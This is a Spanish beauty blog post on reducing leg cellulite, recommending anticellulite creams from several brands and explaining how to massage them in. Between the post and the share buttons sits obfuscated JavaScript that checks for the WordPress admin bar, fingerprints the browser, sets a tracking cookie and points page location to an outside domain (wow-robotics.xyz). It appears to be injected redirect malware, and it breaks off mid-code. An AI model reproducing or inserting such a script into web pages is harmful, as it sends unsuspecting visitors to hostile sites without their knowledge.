¡Qué gusto lucir unas piernas bonitas, bien hidratadas y sin celulitis! Pero no nos engañemos, a la mayoría de las mujeres –antes o después- nos suele salir piel de naranja en algunas zonas del cuerpo como glúteos, vientre y piernas. Es cierto que no es fácil erradicarla del todo, pero sí prevenirla y disminuir sus efectos. Al igual que el volumen en las piernas, podemos reducirla a base de una adecuada alimentación, ejercicio físico y un tratamiento específico. No te rindas y prepara tu cuerpo para el verano, ¡lucirás unas piernas de infarto!

Cuando hemos cogido unos kilos de más

Pasadas las navidades, todos estamos como locos por quitarnos esos kilos que hemos cogido y  que tanto nos molestan. Si no hacemos nada, se quedarán para siempre en el abdomen, los brazos, la cadera o las piernas. ¡Es el momento de actuar! Si sientes que tus piernas están flácidas o han aumentado de volumen, una dieta equilibrada, ejercicio aeróbico y un buen tratamiento estético le devolverán el tono que buscas.

como-reducir-la-celulitis-en-las-piernas

Qué es la celulitis

También se la conoce como piel de naranja y es un problema que afecta más a las mujeres que a los hombres. Se trata de la acumulación de tejido adiposo en zonas donde suele haber grasa, como glúteos, piernas, caderas o brazos. Estéticamente son pequeños agujeritos que se forman en la piel y solemos tratar de esconderlos cuando aparecen. El sedentarismo, el sobrepeso, una alimentación baja en fibra y también el paso de los años, hacen que la mayoría de las mujeres –incluso las delgadas- tengan celulitis en alguna parte de su cuerpo.

Para combatirla, puedes utilizar el Serum Expert Reducteur Contours de Carita, que actúa sobre los primeros síntomas de aparición de celulitis, con un efecto reductor visible. Tiene como ingrediente base la cafeína que actuando sobre la zona bien localizada, es capaz de eliminar grasas y reducir la piel de naranja. El resultado es muy notorio: unas piernas mucho más finas y esbeltas.

También puedes utilizar Advanced Body Creator de Shiseido y aplicarlo sobre toda la piel, especialmente en aquellas zonas más propensas a la aparición de celulitis. Lo ideal es aplicarlo dos veces al día para que su resultado sea exitoso, además su textura con forma de gel-crema fresco nos aporta una agradable sensación.

tratamiento-celulitis-piernas

Cómo aplicar la crema anticelulítica

Cuando tenemos propensión a la aparición de celulitis, es muy aconsejable acudir a un profesional para que nos enseñe a realizar los masajes de forma circular y ascendente: desde las piernas hasta los glúteos. Debemos coger la costumbre y ser disciplinado y aplicar la crema anticelulítica dos veces al día.

Una buena opción es utilizar un tratamiento intensivo, como Cellulinov de Sisley, cuyos activos combaten la celulitis y la piel de naranja, ofreciéndole un aspecto más saludable y una piel más lisa y bonita.

piernas-con-celulitis

Uno de los problemas que hay que combatir es el almacenamiento de grasas y elegir productos que ayudan a eliminarla. Por ejemplo, Body Fit de Clarins es un gel-crema que alisa, reafirma y remodela la silueta. Gracias a su textura y frescor, proporciona a la piel una gran sensación de ligereza y el resultado son unas piernas más saludables y bonitas. ¿Preparada para el verano?

¿Tienes celulitis en alguna zona del cuerpo? ¿Algún producto favorito para combatirla?

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone